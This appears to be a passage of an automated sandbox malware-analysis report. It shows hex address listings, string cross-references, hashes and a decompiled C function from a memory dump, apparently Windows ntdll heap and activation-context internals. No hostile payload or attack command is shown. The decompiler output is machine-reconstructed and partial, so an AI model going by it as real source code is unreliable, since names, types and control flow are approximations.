                                                                                                                                                                            0x1d83d8d6
                                                                                                                                                                            0x1d83d8d8
                                                                                                                                                                            0x1d83d8da
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83d8da
                                                                                                                                                                            0x1d83d842
                                                                                                                                                                            0x1d83d842
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83d842
                                                                                                                                                                            0x1d83d955
                                                                                                                                                                            0x1d83d95a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83d95a
                                                                                                                                                                            0x1d8892ee
                                                                                                                                                                            0x1d8892f2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8892f8
                                                                                                                                                                            0x1d8892fb
                                                                                                                                                                            0x1d889301
                                                                                                                                                                            0x1d88931f
                                                                                                                                                                            0x1d889321
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d889327
                                                                                                                                                                            0x1d889327
                                                                                                                                                                            0x1d88932c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88932c
                                                                                                                                                                            0x1d889306
                                                                                                                                                                            0x1d889313
                                                                                                                                                                            0x1d88931c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88931c
                                                                                                                                                                            0x1d889315
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d889315
                                                                                                                                                                            0x1d889308
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d889308
                                                                                                                                                                            0x1d83d866
                                                                                                                                                                            0x1d83d869
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83d872
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83d872
                                                                                                                                                                            0x1d83d835
                                                                                                                                                                            0x1d83d838
                                                                                                                                                                            0x1d889366
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d889366
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83d838
                                                                                                                                                                            0x1d83d830
                                                                                                                                                                            0x1d83d7ad
                                                                                                                                                                            0x1d88917f
                                                                                                                                                                            0x1d88917f
                                                                                                                                                                            0x1d83d7b3
                                                                                                                                                                            0x1d83d7b8
                                                                                                                                                                            0x1d889188
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d889194
                                                                                                                                                                            0x1d8891a5
                                                                                                                                                                            0x1d8891ac
                                                                                                                                                                            0x1d8891ae
                                                                                                                                                                            0x1d8891b0
                                                                                                                                                                            0x1d8891b7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8891bd
                                                                                                                                                                            0x1d8891bd
                                                                                                                                                                            0x1d8891c8
                                                                                                                                                                            0x1d8891ca
                                                                                                                                                                            0x1d8891d7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8891e5
                                                                                                                                                                            0x1d8891e6
                                                                                                                                                                            0x1d8891ec
                                                                                                                                                                            0x1d8891f0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8891f2
                                                                                                                                                                            0x1d83d7be
                                                                                                                                                                            0x1d83d7be
                                                                                                                                                                            0x1d83d7c2
                                                                                                                                                                            0x1d83d7c5
                                                                                                                                                                            0x1d8891f7
                                                                                                                                                                            0x1d8891fa
                                                                                                                                                                            0x1d8891fe
                                                                                                                                                                            0x1d889213
                                                                                                                                                                            0x1d889216
                                                                                                                                                                            0x1d88921a
                                                                                                                                                                            0x1d88921d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88921f
                                                                                                                                                                            0x1d889224
                                                                                                                                                                            0x1d83d805
                                                                                                                                                                            0x1d83d807
                                                                                                                                                                            0x1d889231
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d889237
                                                                                                                                                                            0x1d88923d
                                                                                                                                                                            0x1d889244
                                                                                                                                                                            0x1d88924e
                                                                                                                                                                            0x1d889254
                                                                                                                                                                            0x1d88925c
                                                                                                                                                                            0x1d889261
                                                                                                                                                                            0x1d889261
                                                                                                                                                                            0x1d88925c
                                                                                                                                                                            0x1d88926d
                                                                                                                                                                            0x1d88926f
                                                                                                                                                                            0x1d889274
                                                                                                                                                                            0x1d889286
                                                                                                                                                                            0x1d889299
                                                                                                                                                                            0x1d88929f
                                                                                                                                                                            0x1d8892a1
                                                                                                                                                                            0x1d8892aa
                                                                                                                                                                            0x1d8892ae
                                                                                                                                                                            0x1d8892b0
                                                                                                                                                                            0x1d8892b0
                                                                                                                                                                            0x1d8892ae
                                                                                                                                                                            0x1d889274
                                                                                                                                                                            0x1d8892b6
                                                                                                                                                                            0x1d8892d9
                                                                                                                                                                            0x1d8892d9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8892b6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83d807
                                                                                                                                                                            0x1d83d7cb
                                                                                                                                                                            0x1d83d7d9
                                                                                                                                                                            0x1d83d7e0
                                                                                                                                                                            0x1d83d7e7
                                                                                                                                                                            0x1d83d7ee
                                                                                                                                                                            0x1d83d7fb
                                                                                                                                                                            0x1d83d800
                                                                                                                                                                            0x1d83d803
                                                                                                                                                                            0x1d83d803
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83d7b8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83d790
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83d902
                                                                                                                                                                            0x1d83d6fb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1D889372
                                                                                                                                                                            • Actx , xrefs: 1D889315
                                                                                                                                                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 1D88914E, 1D889173
                                                                                                                                                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D889178
                                                                                                                                                                            • GsHd, xrefs: 1D83D794
                                                                                                                                                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D889153
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                            • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                                            • API String ID: 3446177414-2196497285
                                                                                                                                                                            • Opcode ID: f417ea0e8bfba86ca0a723fb87ebd6585935c57beec634b36eb44f723b799fd8
                                                                                                                                                                            • Instruction ID: 5b19b554930b4e5b6954c32ea2825b84230f651d4e2e6c1e1aceec606ea5f690
                                                                                                                                                                            • Opcode Fuzzy Hash: f417ea0e8bfba86ca0a723fb87ebd6585935c57beec634b36eb44f723b799fd8
                                                                                                                                                                            • Instruction Fuzzy Hash: 64E1AF74608346EFD711CF29C880B6AB7E4BF88715F044A2DF9998B292D770E845CB93
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                                            			E1D8CF0A5(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                            				signed int _t89;
                                                                                                                                                                            				signed int _t92;
                                                                                                                                                                            				intOrPtr _t93;
                                                                                                                                                                            				intOrPtr _t94;
                                                                                                                                                                            				signed char _t105;
                                                                                                                                                                            				signed int _t106;
                                                                                                                                                                            				intOrPtr _t108;
                                                                                                                                                                            				signed int _t109;
                                                                                                                                                                            				signed int _t110;
                                                                                                                                                                            				intOrPtr _t112;
                                                                                                                                                                            				intOrPtr _t116;
                                                                                                                                                                            				short* _t134;
                                                                                                                                                                            				short _t135;
                                                                                                                                                                            				signed char _t153;
                                                                                                                                                                            				signed int* _t158;
                                                                                                                                                                            				short* _t169;
                                                                                                                                                                            				signed int _t174;
                                                                                                                                                                            				signed int _t184;
                                                                                                                                                                            				signed int _t185;
                                                                                                                                                                            				intOrPtr* _t190;
                                                                                                                                                                            				void* _t191;
                                                                                                                                                                            
                                                                                                                                                                            				_push(0x3c);
                                                                                                                                                                            				_push(0x1d8fd320);
                                                                                                                                                                            				E1D877BE4(__ebx, __edi, __esi);
                                                                                                                                                                            				_t188 = __ecx;
                                                                                                                                                                            				 *((intOrPtr*)(_t191 - 0x3c)) = __ecx;
                                                                                                                                                                            				 *((char*)(_t191 - 0x19)) = 0;
                                                                                                                                                                            				 *(_t191 - 0x24) = 0;
                                                                                                                                                                            				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                                                                                                                                                                            					 *(_t191 - 4) = 0;
                                                                                                                                                                            					 *(_t191 - 4) = 1;
                                                                                                                                                                            					_t87 = E1D817662("RtlAllocateHeap");
                                                                                                                                                                            					__eflags = _t87;
                                                                                                                                                                            					if(_t87 == 0) {
                                                                                                                                                                            						L46:
                                                                                                                                                                            						 *(_t191 - 0x24) = 0;
                                                                                                                                                                            						L47:
                                                                                                                                                                            						 *(_t191 - 4) = 0;
                                                                                                                                                                            						 *(_t191 - 4) = 0xfffffffe;
                                                                                                                                                                            						E1D8CF3F9();
                                                                                                                                                                            						_t89 =  *(_t191 - 0x24);
                                                                                                                                                                            						goto L48;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t153 =  *(__ecx + 0x44) | __edx;
                                                                                                                                                                            					 *(_t191 - 0x2c) = _t153;
                                                                                                                                                                            					_t183 = _t153 | 0x10000100;
                                                                                                                                                                            					 *(_t191 - 0x34) = _t153 | 0x10000100;
                                                                                                                                                                            					_t174 =  *(_t191 + 8);
                                                                                                                                                                            					__eflags = _t174;
                                                                                                                                                                            					 *(_t191 - 0x20) = _t174;
                                                                                                                                                                            					if(_t174 == 0) {
                                                                                                                                                                            						 *(_t191 - 0x20) = 1;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t92 =  *((intOrPtr*)(_t188 + 0x94)) +  *(_t191 - 0x20) &  *(_t188 + 0x98);
                                                                                                                                                                            					__eflags = _t92 - 0x10;
                                                                                                                                                                            					if(_t92 < 0x10) {
                                                                                                                                                                            						_t92 = 0x10;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t93 = _t92 + 8;
                                                                                                                                                                            					 *((intOrPtr*)(_t191 - 0x40)) = _t93;
                                                                                                                                                                            					__eflags = _t93 - _t174;
                                                                                                                                                                            					if(_t93 < _t174) {
                                                                                                                                                                            						L42:
                                                                                                                                                                            						_t94 =  *[fs:0x30];
                                                                                                                                                                            						__eflags =  *(_t94 + 0xc);
                                                                                                                                                                            						if( *(_t94 + 0xc) == 0) {
                                                                                                                                                                            							_push("HEAP: ");
                                                                                                                                                                            							E1D81B910();
                                                                                                                                                                            						} else {
                                                                                                                                                                            							E1D81B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                                            						}
                                                                                                                                                                            						_push( *((intOrPtr*)(_t188 + 0x78)));
                                                                                                                                                                            						E1D81B910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t191 + 8));
                                                                                                                                                                            						goto L46;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						__eflags = _t93 -  *((intOrPtr*)(_t188 + 0x78));
                                                                                                                                                                            						if(_t93 >  *((intOrPtr*)(_t188 + 0x78))) {
                                                                                                                                                                            							goto L42;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t153 & 0x00000001;
                                                                                                                                                                            						if((_t153 & 0x00000001) == 0) {
                                                                                                                                                                            							E1D82FED0( *((intOrPtr*)(_t188 + 0xc8)));
                                                                                                                                                                            							 *((char*)(_t191 - 0x19)) = 1;
                                                                                                                                                                            							_t183 =  *(_t191 - 0x2c) | 0x10000101;
                                                                                                                                                                            							__eflags = _t183;
                                                                                                                                                                            							 *(_t191 - 0x34) = _t183;
                                                                                                                                                                            						}
                                                                                                                                                                            						E1D8D0835(_t188, 0);
                                                                                                                                                                            						_t184 = E1D835D90(_t188, _t188, _t183,  *(_t191 + 8));
                                                                                                                                                                            						 *(_t191 - 0x24) = _t184;
                                                                                                                                                                            						_t176 = 1;
                                                                                                                                                                            						E1D8D0D24(_t188);
                                                                                                                                                                            						__eflags = _t184;
                                                                                                                                                                            						if(_t184 == 0) {
                                                                                                                                                                            							goto L47;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t185 = _t184 + 0xfffffff8;
                                                                                                                                                                            							__eflags =  *((char*)(_t185 + 7)) - 5;
                                                                                                                                                                            							if( *((char*)(_t185 + 7)) == 5) {
                                                                                                                                                                            								_t185 = _t185 - (( *(_t185 + 6) & 0x000000ff) << 3);
                                                                                                                                                                            								__eflags = _t185;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t158 = _t185;
                                                                                                                                                                            							 *(_t191 - 0x38) = _t185;
                                                                                                                                                                            							__eflags =  *(_t188 + 0x4c);
                                                                                                                                                                            							if( *(_t188 + 0x4c) != 0) {
                                                                                                                                                                            								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
                                                                                                                                                                            								__eflags =  *(_t185 + 3) - (_t158[0] ^ _t158[0] ^  *_t158);
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									_push(_t158);
                                                                                                                                                                            									_t176 = _t185;
                                                                                                                                                                            									E1D8DD646(0, _t188, _t185, _t185, _t188, __eflags);
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags =  *(_t185 + 2) & 0x00000002;
                                                                                                                                                                            							if(( *(_t185 + 2) & 0x00000002) == 0) {
                                                                                                                                                                            								_t105 =  *(_t185 + 3);
                                                                                                                                                                            								 *(_t191 - 0x1a) = _t105;
                                                                                                                                                                            								_t106 = _t105 & 0x000000ff;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t134 = E1D853AE9(_t185);
                                                                                                                                                                            								 *((intOrPtr*)(_t191 - 0x28)) = _t134;
                                                                                                                                                                            								__eflags =  *(_t188 + 0x40) & 0x08000000;
                                                                                                                                                                            								if(( *(_t188 + 0x40) & 0x08000000) == 0) {
                                                                                                                                                                            									 *_t134 = 0;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t135 = E1D84FDB9(1, _t176);
                                                                                                                                                                            									_t169 =  *((intOrPtr*)(_t191 - 0x28));
                                                                                                                                                                            									 *_t169 = _t135;
                                                                                                                                                                            									_t134 = _t169;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t45 = _t134 + 2; // 0xffff
                                                                                                                                                                            								_t106 =  *_t45 & 0x0000ffff;
                                                                                                                                                                            							}
                                                                                                                                                                            							 *(_t191 - 0x2c) = _t106;
                                                                                                                                                                            							 *(_t191 - 0x20) = _t106;
                                                                                                                                                                            							__eflags =  *(_t188 + 0x4c);
                                                                                                                                                                            							if( *(_t188 + 0x4c) != 0) {
                                                                                                                                                                            								 *(_t185 + 3) =  *(_t185 + 2) ^  *(_t185 + 1) ^  *_t185;
                                                                                                                                                                            								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
                                                                                                                                                                            								__eflags =  *_t185;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags =  *(_t188 + 0x40) & 0x20000000;
                                                                                                                                                                            							if(( *(_t188 + 0x40) & 0x20000000) != 0) {
                                                                                                                                                                            								__eflags = 0;
                                                                                                                                                                            								E1D8D0835(_t188, 0);
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags =  *(_t191 - 0x24) -  *0x1d9147c0; // 0x0
                                                                                                                                                                            							_t108 =  *[fs:0x30];
                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                            								_t109 =  *(_t108 + 0x68);
                                                                                                                                                                            								 *(_t191 - 0x44) = _t109;
                                                                                                                                                                            								__eflags = _t109 & 0x00000800;
                                                                                                                                                                            								if((_t109 & 0x00000800) == 0) {
                                                                                                                                                                            									goto L47;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t110 =  *(_t191 - 0x2c);
                                                                                                                                                                            								__eflags = _t110;
                                                                                                                                                                            								if(_t110 == 0) {
                                                                                                                                                                            									goto L47;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags = _t110 -  *0x1d9147c4; // 0x0
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									goto L47;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags =  *((intOrPtr*)(_t188 + 0x7c)) -  *0x1d9147c6; // 0x0
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									goto L47;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t112 =  *[fs:0x30];
                                                                                                                                                                            								__eflags =  *(_t112 + 0xc);
                                                                                                                                                                            								if( *(_t112 + 0xc) == 0) {
                                                                                                                                                                            									_push("HEAP: ");
                                                                                                                                                                            									E1D81B910();
                                                                                                                                                                            								} else {
                                                                                                                                                                            									E1D81B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                                            								}
                                                                                                                                                                            								_push(E1D8C823A(_t188,  *(_t191 - 0x20)));
                                                                                                                                                                            								_push( *(_t191 + 8));
                                                                                                                                                                            								E1D81B910("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t191 - 0x24));
                                                                                                                                                                            								goto L32;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								__eflags =  *(_t108 + 0xc);
                                                                                                                                                                            								if( *(_t108 + 0xc) == 0) {
                                                                                                                                                                            									_push("HEAP: ");
                                                                                                                                                                            									E1D81B910();
                                                                                                                                                                            								} else {
                                                                                                                                                                            									E1D81B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                                            								}
                                                                                                                                                                            								_push( *(_t191 + 8));
                                                                                                                                                                            								E1D81B910("Just allocated block at %p for %Ix bytes\n",  *0x1d9147c0);
                                                                                                                                                                            								L32:
                                                                                                                                                                            								_t116 =  *[fs:0x30];
                                                                                                                                                                            								__eflags =  *((char*)(_t116 + 2));
                                                                                                                                                                            								if( *((char*)(_t116 + 2)) != 0) {
                                                                                                                                                                            									 *0x1d9147a1 = 1;
                                                                                                                                                                            									 *0x1d914100 = 0;
                                                                                                                                                                            									asm("int3");
                                                                                                                                                                            									 *0x1d9147a1 = 0;
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L47;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t190 =  *0x1d913748; // 0x0
                                                                                                                                                                            					 *0x1d9191e0(__ecx, __edx,  *(_t191 + 8));
                                                                                                                                                                            					_t89 =  *_t190();
                                                                                                                                                                            					L48:
                                                                                                                                                                            					 *[fs:0x0] =  *((intOrPtr*)(_t191 - 0x10));
                                                                                                                                                                            					return _t89;
                                                                                                                                                                            				}
                                                                                                                                                                            			}

























                                                                                                                                                                            0x1d8cf0a5
                                                                                                                                                                            0x1d8cf0a7
                                                                                                                                                                            0x1d8cf0ac
                                                                                                                                                                            0x1d8cf0b3
                                                                                                                                                                            0x1d8cf0b5
                                                                                                                                                                            0x1d8cf0ba
                                                                                                                                                                            0x1d8cf0bd
                                                                                                                                                                            0x1d8cf0c7
                                                                                                                                                                            0x1d8cf0e3
                                                                                                                                                                            0x1d8cf0e6
                                                                                                                                                                            0x1d8cf0f4
                                                                                                                                                                            0x1d8cf0f9
                                                                                                                                                                            0x1d8cf0fb
                                                                                                                                                                            0x1d8cf3d2
                                                                                                                                                                            0x1d8cf3d2
                                                                                                                                                                            0x1d8cf3d5
                                                                                                                                                                            0x1d8cf3d5
                                                                                                                                                                            0x1d8cf3d8
                                                                                                                                                                            0x1d8cf3df
                                                                                                                                                                            0x1d8cf3e4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8cf3e4
                                                                                                                                                                            0x1d8cf104
                                                                                                                                                                            0x1d8cf106
                                                                                                                                                                            0x1d8cf10b
                                                                                                                                                                            0x1d8cf111
                                                                                                                                                                            0x1d8cf114
                                                                                                                                                                            0x1d8cf117
                                                                                                                                                                            0x1d8cf119
                                                                                                                                                                            0x1d8cf11c
                                                                                                                                                                            0x1d8cf11e
                                                                                                                                                                            0x1d8cf11e
                                                                                                                                                                            0x1d8cf12e
                                                                                                                                                                            0x1d8cf134
                                                                                                                                                                            0x1d8cf137
                                                                                                                                                                            0x1d8cf13b
                                                                                                                                                                            0x1d8cf13b
                                                                                                                                                                            0x1d8cf13c
                                                                                                                                                                            0x1d8cf13f
                                                                                                                                                                            0x1d8cf142
                                                                                                                                                                            0x1d8cf144
                                                                                                                                                                            0x1d8cf350
                                                                                                                                                                            0x1d8cf350
                                                                                                                                                                            0x1d8cf356
                                                                                                                                                                            0x1d8cf359
                                                                                                                                                                            0x1d8cf378
                                                                                                                                                                            0x1d8cf37d
                                                                                                                                                                            0x1d8cf35b
                                                                                                                                                                            0x1d8cf370
                                                                                                                                                                            0x1d8cf375
                                                                                                                                                                            0x1d8cf383
                                                                                                                                                                            0x1d8cf38e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8cf14a
                                                                                                                                                                            0x1d8cf14a
                                                                                                                                                                            0x1d8cf14d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8cf153
                                                                                                                                                                            0x1d8cf156
                                                                                                                                                                            0x1d8cf15e
                                                                                                                                                                            0x1d8cf163
                                                                                                                                                                            0x1d8cf16a
                                                                                                                                                                            0x1d8cf16a
                                                                                                                                                                            0x1d8cf170
                                                                                                                                                                            0x1d8cf170
                                                                                                                                                                            0x1d8cf177
                                                                                                                                                                            0x1d8cf186
                                                                                                                                                                            0x1d8cf188
                                                                                                                                                                            0x1d8cf18b
                                                                                                                                                                            0x1d8cf18f
                                                                                                                                                                            0x1d8cf194
                                                                                                                                                                            0x1d8cf196
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8cf19c
                                                                                                                                                                            0x1d8cf19c
                                                                                                                                                                            0x1d8cf19f
                                                                                                                                                                            0x1d8cf1a3
                                                                                                                                                                            0x1d8cf1ac
                                                                                                                                                                            0x1d8cf1ac
                                                                                                                                                                            0x1d8cf1ac
                                                                                                                                                                            0x1d8cf1ae
                                                                                                                                                                            0x1d8cf1b0
                                                                                                                                                                            0x1d8cf1b3
                                                                                                                                                                            0x1d8cf1b6
                                                                                                                                                                            0x1d8cf1bb
                                                                                                                                                                            0x1d8cf1c5
                                                                                                                                                                            0x1d8cf1c8
                                                                                                                                                                            0x1d8cf1ca
                                                                                                                                                                            0x1d8cf1cb
                                                                                                                                                                            0x1d8cf1cf
                                                                                                                                                                            0x1d8cf1cf
                                                                                                                                                                            0x1d8cf1c8
                                                                                                                                                                            0x1d8cf1d4
                                                                                                                                                                            0x1d8cf1d8
                                                                                                                                                                            0x1d8cf208
                                                                                                                                                                            0x1d8cf20b
                                                                                                                                                                            0x1d8cf20e
                                                                                                                                                                            0x1d8cf1da
                                                                                                                                                                            0x1d8cf1dc
                                                                                                                                                                            0x1d8cf1e1
                                                                                                                                                                            0x1d8cf1e6
                                                                                                                                                                            0x1d8cf1ed
                                                                                                                                                                            0x1d8cf1ff
                                                                                                                                                                            0x1d8cf1ef
                                                                                                                                                                            0x1d8cf1f0
                                                                                                                                                                            0x1d8cf1f5
                                                                                                                                                                            0x1d8cf1f8
                                                                                                                                                                            0x1d8cf1fb
                                                                                                                                                                            0x1d8cf1fb
                                                                                                                                                                            0x1d8cf202
                                                                                                                                                                            0x1d8cf202
                                                                                                                                                                            0x1d8cf202
                                                                                                                                                                            0x1d8cf211
                                                                                                                                                                            0x1d8cf214
                                                                                                                                                                            0x1d8cf218
                                                                                                                                                                            0x1d8cf21b
                                                                                                                                                                            0x1d8cf227
                                                                                                                                                                            0x1d8cf22d
                                                                                                                                                                            0x1d8cf22d
                                                                                                                                                                            0x1d8cf22d
                                                                                                                                                                            0x1d8cf22f
                                                                                                                                                                            0x1d8cf236
                                                                                                                                                                            0x1d8cf238
                                                                                                                                                                            0x1d8cf23c
                                                                                                                                                                            0x1d8cf23c
                                                                                                                                                                            0x1d8cf244
                                                                                                                                                                            0x1d8cf24a
                                                                                                                                                                            0x1d8cf250
                                                                                                                                                                            0x1d8cf2be
                                                                                                                                                                            0x1d8cf2c1
                                                                                                                                                                            0x1d8cf2c4
                                                                                                                                                                            0x1d8cf2c9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8cf2cf
                                                                                                                                                                            0x1d8cf2d2
                                                                                                                                                                            0x1d8cf2d5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8cf2db
                                                                                                                                                                            0x1d8cf2e2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8cf2ec
                                                                                                                                                                            0x1d8cf2f3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8cf2f9
                                                                                                                                                                            0x1d8cf2ff
                                                                                                                                                                            0x1d8cf302
                                                                                                                                                                            0x1d8cf321
                                                                                                                                                                            0x1d8cf326
                                                                                                                                                                            0x1d8cf304
                                                                                                                                                                            0x1d8cf319
                                                                                                                                                                            0x1d8cf31e
                                                                                                                                                                            0x1d8cf337
                                                                                                                                                                            0x1d8cf338
                                                                                                                                                                            0x1d8cf343
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8cf252
                                                                                                                                                                            0x1d8cf252
                                                                                                                                                                            0x1d8cf255
                                                                                                                                                                            0x1d8cf274
                                                                                                                                                                            0x1d8cf279
                                                                                                                                                                            0x1d8cf257
                                                                                                                                                                            0x1d8cf26c
                                                                                                                                                                            0x1d8cf271
                                                                                                                                                                            0x1d8cf27f
                                                                                                                                                                            0x1d8cf28d
                                                                                                                                                                            0x1d8cf295
                                                                                                                                                                            0x1d8cf295
                                                                                                                                                                            0x1d8cf29b
                                                                                                                                                                            0x1d8cf29f
                                                                                                                                                                            0x1d8cf2a5
                                                                                                                                                                            0x1d8cf2ac
                                                                                                                                                                            0x1d8cf2b2
                                                                                                                                                                            0x1d8cf2b3
                                                                                                                                                                            0x1d8cf2b3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8cf29f
                                                                                                                                                                            0x1d8cf250
                                                                                                                                                                            0x1d8cf196
                                                                                                                                                                            0x1d8cf0c9
                                                                                                                                                                            0x1d8cf0ce
                                                                                                                                                                            0x1d8cf0d6
                                                                                                                                                                            0x1d8cf0dc
                                                                                                                                                                            0x1d8cf3e7
                                                                                                                                                                            0x1d8cf3ea
                                                                                                                                                                            0x1d8cf3f6
                                                                                                                                                                            0x1d8cf3f6

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                                            • API String ID: 3446177414-1745908468
                                                                                                                                                                            • Opcode ID: 93186084fd1d992ae93ff24d83401fe52a9c57a1ad8bb20747c09d59f57b0587
                                                                                                                                                                            • Instruction ID: e716c3e51adf0c10477be61904433592394eabaa6802791ab3d65f93c0aae276
                                                                                                                                                                            • Opcode Fuzzy Hash: 93186084fd1d992ae93ff24d83401fe52a9c57a1ad8bb20747c09d59f57b0587
                                                                                                                                                                            • Instruction Fuzzy Hash: E891DE36909645EFEB02CFA8C440BEDBBF2FF49720F15805AE5559B262C735E941CB12
                                                                                                                                                                            Uniqueness

